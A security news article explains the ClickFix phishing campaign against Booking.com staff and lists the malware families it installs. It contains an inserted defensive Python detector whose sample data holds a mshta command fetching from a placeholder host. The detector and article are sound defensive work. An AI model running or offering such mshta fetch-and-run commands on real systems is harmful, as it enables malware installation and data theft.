Booking.com Becomes the Latest Target of ClickFix Hackers


A New Cyber Threat Hits Booking.com

A dangerous cyberattack campaign called ClickFix is now targeting Booking.com. This well-known travel platform is used by millions of people to book hotels, resorts, and vacation stays. But now, cybercriminals are using clever tricks to steal personal and financial information from both hotel staff and guests.

Hackers behind this attack use fake emails to trick Booking.com employees. These emails look like they come from real customers or even from the company itself. They ask the recipient to fix an issue, verify an account, or check a bad review. To do so, they must complete a “CAPTCHA” test. However, this is a trap. Instead of a real security check, this CAPTCHA is a trick that helps hackers secretly install dangerous programs on the victim’s computer.

This attack is particularly dangerous because it appears so convincing. The fake CAPTCHA makes people feel like they are doing something normal and safe. But in reality, they are unknowingly giving hackers control over their systems.

How the ClickFix Scam Works

Cybercriminals behind ClickFix have developed a step-by-step method to steal sensitive data. Their main goal is to gain access to Booking.com employee accounts, which store customer information, including payment details and personal data. The attack begins with hackers sending phishing emails that appear to come from Booking.com customers, fellow employees, or even the company itself. These emails may discuss a fake complaint, a customer query, or an important update. Within the email, there is a button or a PDF attachment containing a link. Clicking on this link directs the user to a website that mimics a real CAPTCHA page, tricking them into believing they are verifying their identity.

Once the user completes the fake CAPTCHA, an invisible command is copied to their clipboard, the temporary storage space for copied text on a computer. The victim is then instructed to open the Windows Run dialog and paste the copied content. Since they cannot see what was copied, they unknowingly execute a malicious command on their computer. This command launches the mshta.exe program, which downloads and installs various types of malware on the system. Once installed, these malicious programs allow hackers to remotely control the infected computer, steal passwords, and access sensitive customer data.
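A defender-side check for the behaviour described above, added here as an example and not taken from the original article: it flags mshta.exe started from explorer.exe (the parent process of Run-dialog launches) with a remote URL argument, and the same pattern in Run-dialog history (the RunMRU registry values, which end in `\1`). The event field names, host names and URLs are constructed for illustration.

```python
import re
from ntpath import basename  # Windows path handling on any OS

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# "mshta" or "mshta.exe" as a whole program name, bare or with a full path.
MSHTA_RE = re.compile(r"(?:^|[\\/\s\"'])mshta(?:\.exe)?(?=$|[\s\"'])", re.IGNORECASE)

def suspicious_command(command):
    """Return the remote URL if the command runs mshta against one, else None."""
    if not MSHTA_RE.search(command):
        return None
    match = URL_RE.search(command)
    return match.group(0) if match else None

def scan_process_events(events):
    """Flag process-creation events where explorer.exe started mshta with a URL."""
    hits = []
    for ev in events:
        if basename(ev["parent_image"]).lower() != "explorer.exe":
            continue
        url = suspicious_command(ev["command_line"])
        if url:
            hits.append((ev["host"], url))
    return hits

def scan_runmru(values):
    """Flag Run-dialog history entries (RunMRU values carry a trailing \\1)."""
    commands = [v[:-2] if v.endswith("\\1") else v for v in values]
    return [c for c in commands if suspicious_command(c)]

# Constructed sample data (not taken from a real incident).
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"mshta.exe https://captcha-check.example.invalid/v"},
    {"host": "FRONTDESK-02", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\a\notes.txt"},
    {"host": "BACKOFFICE-03", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" C:\Vendor\help.hta'},
]
SAMPLE_RUNMRU = [r"cmd\1", r"mshta https://captcha-check.example.invalid/v\1"]

if __name__ == "__main__":
    for host, url in scan_process_events(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: mshta launched from explorer.exe fetching {url}")
    for cmd in scan_runmru(SAMPLE_RUNMRU):
        print(f"[ALERT] Run-dialog history contains: {cmd}")
```

explorer.exe is also the parent of programs started by double-click or shortcut, so a hit is a triage signal to investigate rather than proof that the Run dialog was used.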

What Happens After the Infection?

The malware downloaded by ClickFix attacks is extremely dangerous. These programs allow hackers to spy on users, steal financial data, and even take full control of the infected device. Here are some of the most harmful malware families being used in this attack:

  • XWorm: A type of remote access trojan (RAT) that allows hackers to take over a system and control it from afar.
  • Lumma Stealer: A tool that steals saved passwords, credit card details, and other personal information.
  • VenomRAT: A program that gives attackers full access to a computer’s files and camera.
  • AsyncRAT: Used to monitor a victim’s activities and steal private information.
  • Danabot: A banking trojan that steals financial data.
  • NetSupport RAT: A remote access tool that gives hackers full control of an infected computer.

With these tools, cybercriminals can steal money, access private customer details, and even use hacked accounts to launch more attacks on Booking.com users. Once they have access to an employee’s account, they can send emails to real customers, tricking them into sharing their personal data.

This means guests who have booked hotels through Booking.com might also be at risk. If a hacker-controlled employee account messages them, they could be tricked into providing their credit card details or clicking on dangerous links.

How to Stay Safe from ClickFix Attacks

With cyberattacks becoming more sophisticated, it’s important for both employees and customers to stay alert. To avoid falling victim to scams like ClickFix, always verify the sender’s email address when receiving unexpected messages asking you to click a link or download a file. Scammers often create a sense of urgency to push victims into acting without thinking, so always pause and verify before taking action. If an email or website asks you to copy and paste something into your computer’s Run dialog, do not do it, as this is a major red flag. Installing strong security software can help detect and block malicious programs before they infect your computer. Employees and users should enable two-factor authentication (2FA) on their Booking.com accounts for added security. Lastly, if you receive a suspicious email claiming to be from Booking.com, report it immediately to the company’s security team to prevent further attacks.

This latest ClickFix cyberattack shows how dangerous modern phishing scams have become. Even trusted platforms like Booking.com can be used by hackers to launch attacks on unsuspecting users. The best way to stay safe is to remain cautious and follow cybersecurity best practices. Cybercriminals are always coming up with new tricks, but by staying informed, users can protect themselves from falling into their traps.

 
